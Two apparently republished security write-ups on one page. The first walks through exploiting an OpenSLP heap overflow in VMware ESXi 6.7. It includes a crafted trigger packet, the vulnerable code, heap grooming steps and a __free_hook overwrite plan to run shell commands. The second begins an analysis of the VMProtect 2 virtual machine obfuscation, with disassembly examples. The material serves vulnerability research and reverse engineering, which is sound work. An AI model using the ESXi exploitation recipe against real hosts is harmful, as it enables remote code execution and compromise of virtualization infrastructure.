Body:  bytearray(b'\x00\x00`\xa4`S\x00+service:VMwareInfrastructure:/192.168.0.191\x00\x03BBB\x00\x00\x00\x00\x00\x00')

Error Code:  0x0000
Boot Timestamp:  0x60a46053
Length of URL:  0x002b
URL:  b'service:VMwareInfrastructure:/192.168.0.191'
Length of <scope-list>:  0x0003
<scope-list>:  b'BBB'
Length of <attr-list>:  0x0000
<attr-list>:  0x0000
Length of <SLP SPI List>:  0x0000
<SLP SPI List> String:  b''
# Auth Blocks:  0x0000
Authentication block (if any):  b''

[SLP Client-1] directory agent advertisement
[SLP Client-1] recv:  b''

The Bug

As noted in Lucas’ blog, the bug is in the ‘SLPParseSrvURL’ function, which gets called when a ‘directory agent advertisement’ message is being process.

undefined4 SLPParseSrvUrl(int param_1,char *param_2,void **param_3)

{
  char cVar1;
  void **__ptr;
  char *pcVar2;
  char *pcVar3;
  void *pvVar4;
  char *pcVar5;
  char *__src;
  char *local_28;
  void **local_24;
  
  if (param_2 == (char *)0x0) {
    return 0x16;
  }
  *param_3 = (void *)0x0;
  __ptr = (void **)calloc(1,param_1 + 0x1d);                                       [1]
  if (__ptr == (void **)0x0) {
    return 0xc;
  }
  pcVar2 = strstr(param_2,":/");                                                   [2]
  if (pcVar2 == (char *)0x0) {
    free(__ptr);
    return 0x16;
  }
  pcVar5 = param_2 + param_1;
  memcpy((void *)((int)__ptr + 0x15),param_2,(size_t)(pcVar2 + -(int)param_2));    [3]

On line 18, the length of the URL is added with the number 0x1d to form the final size to ‘calloc’ from memory. On line 22, the ‘strstr’ function is called to seek the position of the substring “:/” within the URL. On line 28, the content of the URL before the substring “:/” will be copied into the newly ‘calloced’ memory from line 18.

Another thing to note is that the ‘strstr’ function will return 0 if the substring “:/” does not exists or if the function hits a null character.

I speculated VMware test case only tried ‘scopes’ with a length size below 256. If we look at the following ‘directory agent advertisement’ layout snippet, we see sample 1’s length of ‘scopes’ includes a null byte. This null byte accidentally acted as the string terminator for ‘URL’ since it sits right after it. If the length of ‘scopes’ is above 256, the hex representation of the length will not have a null byte (as in sample 2), and therefore the ‘strstr’ function will read passed the ‘URL’ and continue seeking the substring “:/” in ‘scopes’.

Sample 1 - won't trigger bug:

Body:  bytearray(b'\x00\x00`\xa4`S\x00+service:VMwareInfrastructure:/192.168.0.191\x00\x03BBB\x00\x00\x00\x00\x00\x00')

Error Code:  0x0000
Boot Timestamp:  0x60a46053
Length of URL:  0x002b
URL:  b'service:VMwareInfrastructure:/192.168.0.191'
****** Length of <scope-list>:  0x0003 ******
<scope-list>:  b'BBB'
Length of <attr-list>:  0x0000
<attr-list>:  0x0000
Length of <SLP SPI List>:  0x0000
<SLP SPI List> String:  b''
# Auth Blocks:  0x0000
Authentication block (if any):  b''

Sample 2 - triggers the bug:

Body:  bytearray(b'\x00\x00`\xa4\x9a\x14\x00\x18AAAAAAAAAAAAAAAAAAAAAAAA\x02\x98BBBBBBBBBBBBBA\x01:/CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x00\x00\x00\x00\x00\x00')

Error Code:  0x0000
Boot Timestamp:  0x60a49a14
Length of URL:  0x0018
URL:  b'AAAAAAAAAAAAAAAAAAAAAAAA'
****** Length of <scope-list>:  0x0298 ******
<scope-list>:  b'BBBBBBBBBBBBBA\x01:/CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC'
Length of <attr-list>:  0x0000
<attr-list>:  0x0000
Length of <SLP SPI List>:  0x0000
<SLP SPI List> String:  b''
# Auth Blocks:  0x0000
Authentication block (if any):  b''

Therefore, the ‘memcpy’ call will lead to a heap overflow because the source contains content from‘URL’ + part of ‘scopes’ while the destination only have spaces to fit ‘URL’.

SLP Objects

Here I will go over the relevant SLP components as they serve as the building blocks for exploitation.

_SLPDSocket

All client that connects to the ‘slpd’ daemon will create a ‘slpd-socket’ object on the heap. This object contains information on the current state of the connection, such as whether it is in a reading state or writing state. Other important information stored in this object includes the client’s IP address, the socket file descriptor in-use for the connection, pointers to ‘recv-buffer’ and ‘send-buffer’ for this specific connection, and pointers to ‘slpd-socket’ object created from prior and future established connections. The size of this object is fixed at 0xd0, and cannot be changed.

// https://github.com/openslp-org/openslp/blob/df695199138ce400c7f107804251ccc57a6d5f38/openslp/slpd/slpd_socket.h
/** Structure representing a socket
 */
typedef struct _SLPDSocket
{
   SLPListItem listitem;    
   sockfd_t fd;
   time_t age;    /* in seconds -- in unicast dgram sockets, this also drives the resend logic */
   int state;
   int can_send_mcast;  /*Instead of allocating outgoing sockets to for sending multicast messages, slpd
                          uses incoming unicast sockets that were bound to the network interface.  Unicast
                          sockets are used because some stacks use the multicast address as the source address
                          if the socket was bound to the multicast address.  Since we don't want to send
                          mcast out of all the unicast sockets, this flag is used*/

   /* addrs related to the socket */
   struct sockaddr_storage localaddr;
   struct sockaddr_storage peeraddr;
   struct sockaddr_storage mcastaddr;

   /* Incoming socket stuff */
   SLPBuffer recvbuf;
   SLPBuffer sendbuf;

   /* Outgoing socket stuff */
   int reconns; /*For stream sockets, this drives reconnect.  For unicast dgram sockets, this drives resend*/
   SLPList sendlist;
#if HAVE_POLL
   int fdsetnr;
#endif
} SLPDSocket;
memory layout for a _SLPDSocket object

_SLPBuffer

All SLP message types received from the server will create at least two SLPBuffer objects. One is called ‘recv-buffer’, which stores the data received by the server from the client. Since I can control the size of the data I send from the client, I can control the size of the ‘recv-buffer’. The other SLPBuffer object is called ‘send-buffer’. This buffer stores the data that will be send from the server to client. The ‘send-buffer’ have a fixed size of 0x598 and I cannot control its size. Furthermore, the SLPBuffer have meta-data properties that points to the starting, current, and ending position of said data.

//https://github.com/openslp-org/openslp/blob/df695199138ce400c7f107804251ccc57a6d5f38/openslp/common/slp_buffer.h
/** Buffer object holds SLP messages.
 */
typedef struct _SLPBuffer
{
   SLPListItem listitem;   /*!< @brief Allows SLPBuffers to be linked. */
   size_t allocated;       /*!< @brief Allocated size of buffer. */
   uint8_t * start;        /*!< @brief Points to start of space. */
   uint8_t * curpos;       /*!< @brief @p start < @c @p curpos < @p end */
   uint8_t * end;          /*!< @brief Points to buffer limit. */
} * SLPBuffer;
memory layout for a _SLPBuffer object

SLP Socket State

The SLP Socket State defines the status for a particular connection. The state value is set in the _SLPSocket object. A connection will either be calling ‘recv’ or ‘send’ depending on the state of the socket.

//https://github.com/openslp-org/openslp/blob/df695199138ce400c7f107804251ccc57a6d5f38/openslp/slpd/slpd_socket.h
/* Values representing a type or state of a socket */
#define SOCKET_PENDING_IO       100
#define SOCKET_LISTEN           0
#define SOCKET_CLOSE            1
#define DATAGRAM_UNICAST        2
#define DATAGRAM_MULTICAST      3
#define DATAGRAM_BROADCAST      4
#define STREAM_CONNECT_IDLE     5
#define STREAM_CONNECT_BLOCK    6   + SOCKET_PENDING_IO
#define STREAM_CONNECT_CLOSE    7   + SOCKET_PENDING_IO
#define STREAM_READ             8   + SOCKET_PENDING_IO
#define STREAM_READ_FIRST       9   + SOCKET_PENDING_IO
#define STREAM_WRITE            10  + SOCKET_PENDING_IO
#define STREAM_WRITE_FIRST      11  + SOCKET_PENDING_IO
#define STREAM_WRITE_WAIT       12  + SOCKET_PENDING_IO

states constants defined in OpenSLP source code

It is important to understand the properties of _SLPSocket, _SLPBuffer and Socket States because the exploitation process requires modifying those values.

Objectives, Expectations and Limitations

This section goes over objectives required to land a successful exploitation.

Objective 1

Achieve remote code execution by leveraging the heap overflow to overwrite the ‘__free_hook’ to point to shellcode or ROP chain.

Expectation 1

If I can overwrite the ‘position’ pointers in a _SLPBuffer ‘recv-buffer’ object, I can force incoming data to the server to be written to arbitrary memory location.

Objective 2

In order to know the address of ‘__free_hook’, I have to leak an address referencing the libc library.

Expectation 2

If I can overwrite the ‘position’ pointers in a _SLPBuffer ‘send-buffer’ object, I can force outgoing data from the server to read from arbitrary memory location.

Now that I defined goals and objectives, I have to identify any limitations with the heap overflow vector and memory allocation in general.

Limitations

  1. ‘URL’ data stored in the “Directory Agent Advertisement’s URL” object cannot contain null bytes (due to the ‘strstr’ function). This limitation prevents me from directly overwriting meta-data within an adjacent ‘_SLPDSocket’ or ‘_SLPBuffer’ object because I would have to supply an invalid size value for the objects’ heap header before reaching those properties.
  2. The ‘slpd’ binary allocates ‘_SLPDSocket’ and ‘_SLPBuffer’ objects with ‘calloc’. The ‘calloc’ call will zero out the allocated memory slot. This limitation removes all past data of a memory slot which could contain interesting pointers or stack addresses. This looks like a show stopper because if I was to overwrite a ‘position’ pointer in a _SLPBuffer, I would need to know a valid address value. Since I don’t know such value, the next best thing I can do is partially overwrite a ‘position’ pointer to at least get me in a valid address range that could be meaningful. With ‘calloc’ zeroing everything out, I lose that opportunity.

Fortunately, not all is lost. As shared in Lucas’ blog post, I can still get around the limitations.

Limitations Bypass

  1. Use the heap overflow to partially overwrite the adjacent free memory chunk’s size to extend it. By extending the free chunk, I can have it position to overlap with its neighbor ‘_SLPDSocket’ or ‘_SLPBuffer’ object. When I allocate memory that occupies the extended free space, I can overwrite the object’s properties.
  2. The ‘calloc’ call will retain past data of a memory slot if it was previously marked as ‘IS_MAPPED’ when it was still freed. The key thing is the ‘calloc’ call must request a chunk size that is an exact size as the freed slot with ‘IS_MAPPED’ flag enabled to preserve its old data. If a ‘IS_MAPPED’ freed chunk is splitted up by a ‘calloc’ request, the ‘calloc’ will service a chunk without the ‘IS_MAPPED’ flag and zero out the slot’s content.

There is still one more catch. Even if I can mark arbitrary position to store or read data for the _SLPBuffer, the ‘slpd’ binary will not comply unless associated socket state is set to the proper status. Therefore, the heap overflow will also have to overwrite the associated _SLPDSocket object’s meta-data in order to get arbitrary read and write primitive to work.

Heap Grooming

This sections goes over the heap grooming strategy to achieve the following:

The Building Blocks

Before I go over the heap grooming design, I want to say a few words about the purpose of the SLP messages mentioned earlier in fitting into the exploitation process.

service request — primarily use for creating a consecutive heap layout and holes.

directory agent advertisement — use to trigger the heap overflow vector to overwrite into the next neighbor memory block.

service registration — store user controlled data into the memory database which will be retrieved through the ‘attribute request’ message. This message is solely to set up ‘attribute request’ and is not used for the purpose of heap grooming.

attribute request — pull user controlled data from the memory database. Its purpose is to create a ‘marker’ that can be used to identify current position during the information leak stage. Also, the dynamic memory use to store the user controlled data can be a good stack pivot spot with complete user controllable content.

Overwrite _SLPBuffer ‘send-buffer’ object (Arbitrary Read Primitive)

(1). Client A, B, and C create connections to server. Client A sends ‘service request’ message. Client D creates connection and sends ‘service request’ message. Client B sends ‘service request’ message.
(2). Close client D’s connection.
(3). Client E creates a connection and sends an ‘attribute request’ message.
(4). Client E’s ‘send-buffer’ will go through reallocation because the data is too large.
(5). Client E’s connection is still intact and not closed, however, the ‘message’ object is now freed.
(6). Client G and H creates connection to server. Client C will now send a ‘service request’ to fill the hole left by Client E’s ‘send-buffer’ reallocation and freed ‘message’.
(7). Close client B’s connection.
(8). Client F creates connection to server and sends a ‘directory agent advertisement’ message. This leaves a freed 0x100 size chunk right after the ‘URL’ object for extension and overlapping.
(9). The ‘URL’ object extended its neighboring freed chunk size from 0x100 to 0x120. The server will free the allocated objects initiated by client F. It can be observed that all objects related to client F are freed and consolidated. The ‘URL’ object is freed as well, but because its size fits in the fast-bin, the ‘URL’ object did not get coalesced.
(10). Client G sends a ‘service request’ message. The first-fit algorithm will assign the extended free block to client G’s ‘recv-buffer’ object. This object overlaps with client E’s ‘send-buffer’, which can now overwrite the ‘position’ pointers in it.
(11). Client J creates connection to server and sends a ‘service request’ message. Its purpose is to fill up the hole left by client F’s ‘directory agent advertisement’ message.
(12). Close client A’s connection.
(13). Client I creates connection to server and sends a ‘directory agent advertisement’ message.
(14). The ‘URL’ object extended its neighboring freed chunk size from 0x100 to 0x140. The server will free the allocated objects initiated by client I. It can be observed that all objects related to client I are freed and consolidated. The ‘URL’ object is freed as well, but because its size fits in the fast-bin, the ‘URL’ object did not get coalesced.
(15). Client H’s sends a ‘service request’ message. The first-fit algorithm will assign the extended free block to client H’s ‘recv-buffer’ object. This object overlaps with client E’s ‘slpd-socket’, which can now overwrite the properties in it.

Overwrite _SLPBuffer ‘recv-buffer’ object (Arbitrary Write Primitive)

(1). Client A creates connection to server and sends ‘service request’ message. Client B creates connection only. Client C creates connection and sends ‘service request’ message. Client B now sends ‘service request’ message. Client D and E create connections to server.
(2). Close client C’s connection.
(3). Client F creates connection to server and sends a ‘directory agent advertisement’ message. This leaves a freed 0x100 size chunk right after the ‘URL’ object for extension and overlapping.
(4). The ‘URL’ object extended its neighboring freed chunk size from 0x100 to 0x140. The server will free the allocated objects initiated by client F. It can be observed that all objects related to client F are freed and consolidated. The ‘URL’ object is freed as well, but because its size fits in the fast-bin, the ‘URL’ object did not get coalesced.
(5). Client E sends a ‘service request’ message. The first-fit algorithm will assign the extended free block to client E’s ‘recv-buffer’ object. This object overlaps with client B’s ‘recv-buffer’, which can now overwrite the ‘position’ pointers in it.
(6). Client G creates connection to server and sends a ‘service request’ message. Its purpose is to fill up the hole left by client F’s ‘directory agent advertisement’ message.
(7). Close client A’s connection.
(8). Client H creates connection to server and sends a ‘directory agent advertisement’ message. This leaves a freed 0x100 size chunk right after the ‘URL’ object for extension and overlapping.
(9). The ‘URL’ object extends its neighboring freed chunk from 0x100 to 0x140. The server will free the allocated object initiated by client H. It can be observed that all objects related to client H are freed and consolidated. The ‘URL’ object is freed as well, but because its size fits in the fast-bin, the ‘URL’ object did not get coalesced.
(10). Client D sends a ‘service request’ message. The first-fit algorithm will assign the extended free block to client D’s ‘recv-buffer’ object. This object overlaps with client B’s ‘slpd-socket’, which can now overwrite the properties in it.

The above visual heap layouts is created with villoc.

Exploitation Strategy Walkthrough

It is best to look at the exploit code along with following the below narration to understand how the exploit works.

  1. Client 1 sends a ‘directory agent advertisement’ request to prepare for any unexpected memory allocation that may happen for this particular request. I observed the request makes additional memory allocation when the ‘slpd’ daemon is run on startup but does not when running it through /etc/init.d/slpd start. Any unexpected memory allocation would eventually be freed and end up on the freelist. The assumptions is these unique freed slots will be used again by future ‘directory agent advertisement’ messages as long as I do not explicitly allocate memory that would hijack them.
  2. Clients 2–5 makes a ‘service request’ with each receiving buffer having a size of 0x40. This is to fill up some initial freed slots that exists on the freelist. If i don’t occupy these freed slot, it would hijack future ‘URL’ memory allocation for future ‘directory agent advertisement’ message and ruin the heap grooming.
  3. Clients 6–10 sets up client 7 to send the ‘service registration’ message to the server. The server only accepts ‘service registration’ message originating from localhost, therefore client 7’s ‘slpd-socket’ needs to be overwritten to have its IP address updated. Once the message is sent, client 7’s socket object will be updated again to hold the listening file descriptor to handle future incoming connection. If this step is skipped, future clients cannot establish connection with the server.
  4. Clients 11–21 sets up the arbitrary read primitive by overwriting client 15’s ‘send-buffer’ position pointers. Since I have no knowledge of what addresses to leak in the first place, I will perform a partial overwrite of the last two significant bytes of the ‘start’ position pointer with null values. This requires setting up the extended free chunk to be marked ‘IS_MAPPED’ to avoid getting zeroed out by the ‘calloc’ call. The ‘send-buffer’ that gets updated belongs to the ‘attribute request’ message. As I have no visibility to how much data will be leaked, I can get a ballpark idea of where the leak is at by including a marker value as part of the ‘service registration’ message noted in step 3. If the leaked content contains the marker, I know it is leaking data from the ‘attribute request’ ‘send-buffer’ object. This tells me it is about time to stop reading from the leak. Lastly, I have to update client 15’s ‘slpd-socket’ to have its state to be in ‘STREAM_WRITE’, which will makes the ‘send’ call to my client.
  5. I was able to collect heap addresses and libc addresses from the leak which I can derive everything else. My goal is to overwrite libc’s __free_hook with libc’s system address. I will need a gadget to position my stack at a location that won’t be subject to alteration by the application. I found a gadget from libc-2.17.so that will stack lift the stack address by 0x100.
  6. With the collected libc address, I can calculate the libc environment address which stores the stack address. I use clients 22–31 to setup the arbitrary read primitive to leak the stack address. I have to update client 25’s file descriptor in the ‘slpd-socket’ to hold the listening file descriptor.
  7. Clients 32–40 sets up the arbitrary write primitive. This requires overwriting client 33’s ‘recv-buffer’ object’s position pointers. It first stores shell commands into client 15’s ‘send-buffer’ object, which is a large slab of space under my control. It then writes the libc’s system address, a fake return address, and the address of the shell command onto the predicted stack location after stack lifting is performed. Afterwards, it overwrites libc’s __free_hook to hold the stack lifting gadget address. Lastly, each arbitrary write requires updating the corresponding ‘slpd-socket’ object state to ‘STREAM_READ’. If this step is skipped, the server will not accept the overwritten values for the position pointers.
  8. The desired shell commands will be executed once all the above steps are completed.

Final Remark

I enjoyed implementing this exploit very much and learned a few things when writing it. One of the biggest thing I learn is never make an assumption and should always test an idea out. When I was trying to get the leaking data part of the exploit code to work, I was preparing to implement it the way Lucas described in his blog, which seems slightly complicated. I was curious as to why I can’t just flip the socket object’s state to ‘STREAM_WRITE’ which send the data back to me. After reviewing the OpenSLP code, I understand the problem and see why Lucas came up with his particular solution. Nevertheless, I still wanted to see what happens if I just flip the state on the socket object, and to my disbelief, the daemon did send me the leaked data immediately without going through the additional hurdles. Another take away is when doing any heap grooming design, it is best to work it backward from how I want the heap to look in its finished form, and back track the layout to the beginning.

The PoC should work out of the box against VMware ESXi 6.7.0 build-14320388, which is the trial version. I was able to get it to work 14 out of 15 tries.

VMProtect 2 — Detailed Analysis of the Virtual Machine Architecture

VMProtect 2 - Detailed Analysis of the Virtual Machine Architecture

Original text by _xeroxz

Download link: VMProtect 2 Reverse Engineering

Table Of Contents
Credit — Links to Existing Work
Preamble — Intentions and Purpose
Purpose
Intentions
Terminology
Introduction
Obfuscation — Deadstore, Opaque Branching
Opaque Branching Obfuscation Example
Deadstore Obfuscation Example
Overview — VMProtect 2 Virtual Machine
Rolling Decryption
Native Register Usage
Non-Volatile Registers — Registers With Specific Usage
Volatile Registers — Temp Registers
vm_entry — Entering The Virtual Machine
calc_jmp — Decryption Of Vm Handler Index
vm_exit — Leaving The Virtual Machine
check_vsp — relocate scratch registers
Virtual Instructions — Opcodes, Operands, Specifications
Operand Decryption — Transformations
VM Handlers — Specifications
LCONST — Load Constant Value Onto Stack
LCONSTQ — Load Constant QWORD
LCONSTCDQE — Load Constant DWORD Sign Extended to a QWORD
LCONSTCBW — Load Constant Byte Convert To Word
LCONSTCWDE — Load Constant Word Convert To DWORD
LCONSTDW — Load Constant DWORD
LREG — Load Scratch Register Value Onto Stack
LREGQ — Load Scratch Register QWORD
LREGDW — Load Scratch Register DWORD
SREG — Set Scratch Register Value
SREGQ — Set Scratch Register Value QWORD
SREGDW — Set Scratch Register Value DWORD
SREGW — Set Scratch Register Value WORD
SREGB — Set Scratch Register Value Byte
ADD — Add Two Values
ADDQ — Add Two QWORD Values
ADDW — Add Two WORDS Values
ADDB — Add Two Bytes Values
MUL — Unsigned Multiplication
MULQ — Unsigned Multiplication of QWORD’s
DIV — Unsigned Division
DIVQ — Unsigned Division Of QWORD’s
READ — Read Memory
READQ — Read QWORD
READDW — Read DWORD
READW — Read Word
WRITE — Write Memory
WRITEQ — Write Memory QWORD
WRITEDW — Write DWORD
WRITEW — Write WORD
WRITEB — Write Byte
SHL — Shift Left
SHLCBW — Shift Left Convert Result To WORD
SHLW — Shift Left WORD
SHLDW — Shift Left DWORD
SHLQ — Shift Left QWORD
SHLD — Shift Left Double Precision
SHLDQ — Shift Left Double Precision QWORD
SHLDDW — Shift Left Double Precision DWORD
SHR — Shift Right
SHRQ — Shift Right QWORD
SHRD — Double Precision Shift Right
SHRDQ — Double Precision Shift Right QWORD
SHRDDW — Double Precision Shift Right DWORD
NAND — Not Then And
NANDW — Not Then And WORD’s
READCR3 — Read Control Register Three
WRITECR3 — Write Control Register Three
PUSHVSP — Push Virtual Stack Pointer
PUSHVSPQ — Push Virtual Stack Pointer QWORD
PUSHVSPDW — Push Virtual Stack Pointer DWORD
PUSVSPW — Push Virtual Stack Pointer WORD
LVSP — Load Virtual Stack Pointer
LVSPW — Load Virtual Stack Pointer Word
LVSPDW — Load Virtual Stack Pointer DWORD
LRFLAGS — Load RFLAGS
JMP — Virtual Jump Instruction
CALL — Virtual Call Instruction
Significant Virtual Machine Signatures — Static Analysis
Locating VM Handler Table
Locating VM Handler Table Entry Decryption
Handling Transformations — Templated Lambdas and Maps
Extracting Transformations — Static Analysis Continued
Static Analysis Dilemma — Static Analysis Conclusion
vmtracer — Tracing Virtual Instructions
vmprofile-cli — Static Analysis Using Runtime Traces
Displaying Trace Information — vmprofiler-qt
Virtual Machine Behavior
Demo — Creating and Inspecting A Virtual Trace
Altering Virtual Instruction Results
Encoding Virtual Instructions — Inverse Transformations
Conclusion — Static Analysis, Dynamic Analysis
Credit — Links to Existing Work
Samuel Chevet
Inside VMProtect 2
Inside VMProtect 2 Slides
Rolf Rolles
Unpacking Virtualization Obfuscators
VMProtect 2 — Reverse Engineering
Anatoli Kalysch
VMAttack IDA PRO Plugin
Can Bölük
VTIL (Virtual-machine Translation Intermediate Language)
NoVmp — A static devirtualizer for VMProtect x64 3.x powered by VTIL.
Katy Hearthstone
VMProtect Control Flow Obfuscation (Case study: string algorithm cryptanalysis in Honkai Impact 3rd)
IRQL0
Helped created vmprofiler v1.0, and helped with general analysis of vm handlers.
BTBD
Providing an algorithm to handle deadstore removal with Zydis.
Preamble — Intentions and Purpose
Before diving into this post I would like to state a few things in regards to existing VMProtect 2 work, the purpose of this article, and my intentions, as these seem to become misconstrued and distorted at times.

Purpose
Although there has been a lot of research already conducted on VMProtect 2, I feel that there is still information which has not been discussed publicly nor enough source code disclosed to the public. The information I am disclosing in this article aims to go beyond generic architectural analysis but much lower. The level in which one could encode their own virtual machine instructions given a VMProtect’ed binary as well as intercept and alter results of virtual instructions with ease. The dynamic analysis discussed in this article is based upon existing work by Samuel Chevet, my dynamic analysis research and vmtracer project is simply an expansion upon his work demonstrated in his presentation “Inside VMProtect”.

Intentions
This post is not intending to cast any negative views upon VMProtect 2, the creator(s) of said software or anyone who uses it. I admire the creator(s) who clearly have impressive skills to create such a product.

This post has also been created under the impression that everything discussed here has most likely been discovered by private entities, and that I am not the first to find or document such things about the VMProtect 2 architecture. I am not intending to present this information as though it is ground breaking or something that no one else has already discovered, quite the opposite. This is simply a collection of existing information appended with my own research.

This being said, I humbly present to you, “VMProtect 2, Detailed Analysis of the Virtual Machine Architecture”.

Terminology
VIP — Virtual Instruction Pointer, this equivalent to the x86-64 RIP register which contains the address of the next instruction to be executed. VMProtect 2 uses the native register RSI to hold the address of the next virtual instruction pointer. Thus RSI is equivalent to VIP.

VSP — Virtual Stack Pointer, this is equivalent to the x86-64 RSP register which contains the address of the stack. VMProtect 2 uses the native register RBP to hold the address of the virtual stack pointer. Thus RBP is equivalent to VSP.

VM Handler — A routine which contains the native code to execute a virtual instruction. For example, the VADD64 instruction adds two values on the stack together and stores the result as well as RFLAGS on the stack.

Virtual Instruction — Also known as “virtual bytecode” is the bytes interpreted by the virtual machine and subsequently executed. Each virtual instruction is composed of at least one or more operands. The first operand contains the opcode for the instruction.

Virtual Opcode — The first operand of every virtual instruction. This is the vm handler index. The size of a VMProtect 2 opcode is always one byte.

IMM / Immediate Value — A value encoded into a virtual instruction by which operations are to happen upon, such as loading said value onto the stack or into a virtual register. Virtual instructions such as LREG, SREG, and LCONST all have immediate values.

Transformations — The term “transform” used throughout this post refers specifically to operations done to decrypt operands of virtual instructions and vm handler table entries. These transformations consist of add, sub, inc, dec, not, neg, shl, shr, ror, rol, and lastly BSWAP. Transformations are done with sizes of 1, 2, 4, and 8 bytes. Transformations can also have immediate/constant values associated with them such as “xor rax, 0x123456”, or “add rax, 0x123456”.

Introduction
VMProtect 2 is a virtual machine based x86 obfuscator which converts x86 instructions to a RISC, stack machine, instruction set. Each protected binary has a unique set of encrypted virtual machine instructions with unique obfuscation. This project aims to disclose very significant signatures which are in every single VMProtect 2 binary with the intent to aid in further research. This article will also briefly discuss different types of VMProtect 2 obfuscation. All techniques to deobfuscate are tailor specifically to virtual machine routines and will not work on generally obfuscated routines, specifically routines which have real JCC’s in them.

Obfuscation — Deadstore, Opaque Branching
VMProtect 2 uses two types of obfuscation for the most part, the first being deadstore, and the second being opaque branching. Throughout obfuscated routines you can see a few instructions followed by a JCC, then another set of instructions followed by another JCC. Another contributing part of opaque branching is random instructions which affect the FLAGS register. You can see these little buggers everywhere. They are mostly bit test instructions, useless compares, as well as set/clear flags instructions.

Opaque Branching Obfuscation Example
In this opaque branching obfuscation example I will go over what VMProtect 2 opaque branching looks like, other factors such as the state of rflags, and most importantly how to determine if you are looking at an opaque branch or a legitimate JCC.

.vmp0:00000001400073B4 D0 C8 ror al, 1
.vmp0:00000001400073B6 0F CA bswap edx
.vmp0:00000001400073B8 66 0F CA bswap dx
.vmp0:00000001400073BB 66 0F BE D2 movsx dx, dl
.vmp0:00000001400073BF 48 FF C6 inc rsi
.vmp0:00000001400073C2 48 0F BA FA 0F btc rdx, 0Fh
.vmp0:00000001400073C7 F6 D8 neg al
.vmp0:00000001400073C9 0F 81 6F D0 FF FF jno loc_14000443E
.vmp0:00000001400073CF 66 C1 FA 04 sar dx, 4
.vmp0:00000001400073D3 81 EA EC 94 CD 47 sub edx, 47CD94ECh
.vmp0:00000001400073D9 28 C3 sub bl, al
.vmp0:00000001400073DB D2 F6 sal dh, cl
.vmp0:00000001400073DD 66 0F BA F2 0E btr dx, 0Eh
.vmp0:00000001400073E2 8B 14 38 mov edx, [rax+rdi]
Consider the above obfuscated code. Notice the JNO branch. If you follow this branch in ida and compare the instructions against the instructions after the JNO you can see that the branch is useless as both paths execute the same meaningful instructions.

loc_14000443E:
.vmp0:000000014000443E F5 cmc
.vmp0:000000014000443F 0F B3 CA btr edx, ecx
.vmp0:0000000140004442 0F BE D3 movsx edx, bl
.vmp0:0000000140004445 66 21 F2 and dx, si
.vmp0:0000000140004448 28 C3 sub bl, al
.vmp0:000000014000444A 48 81 FA 38 04 AA 4E cmp rdx, 4EAA0438h
.vmp0:0000000140004451 48 8D 90 90 50 F5 BB lea rdx, [rax-440AAF70h]
.vmp0:0000000140004458 D2 F2 sal dl, cl
.vmp0:000000014000445A D2 C2 rol dl, cl
.vmp0:000000014000445C 8B 14 38 mov edx, [rax+rdi]
If you look close enough you can see that there are a few instructions which are in both branches. It can be difficult to determine what code is deadstore and what code is required, however if you select a register in ida and look at all the places it is written to prior to the instruction you are looking at, you can remove all of those other writing instructions up until there is a read of said register. Now, back to the example, In this case the following instructions are what matter:

.vmp0:0000000140004448 28 C3 sub bl, al
.vmp0:000000014000445C 8B 14 38 mov edx, [rax+rdi]
Generation of these opaque branches makes it so there are duplicate instructions. For each code path there is also more deadstore obfuscation as well as opaque conditions and other instructions that affect RFLAGS.

Deadstore Obfuscation Example
VMProtect 2 deadstore obfuscation adds the most junk to the instruction stream aside from opaque bit tests and comparisons. These instructions serve no purpose and can be spotted and removed by hand with ease. Consider the following:

.vmp0:0000000140004149 66 D3 D7 rcl di, cl
.vmp0:000000014000414C 58 pop rax
.vmp0:000000014000414D 66 41 0F A4 DB 01 shld r11w, bx, 1
.vmp0:0000000140004153 41 5B pop r11
.vmp0:0000000140004155 80 E6 CA and dh, 0CAh
.vmp0:0000000140004158 66 F7 D7 not di
.vmp0:000000014000415B 5F pop rdi
.vmp0:000000014000415C 66 41 C1 C1 0C rol r9w, 0Ch
.vmp0:0000000140004161 F9 stc
.vmp0:0000000140004162 41 58 pop r8
.vmp0:0000000140004164 F5 cmc
.vmp0:0000000140004165 F8 clc
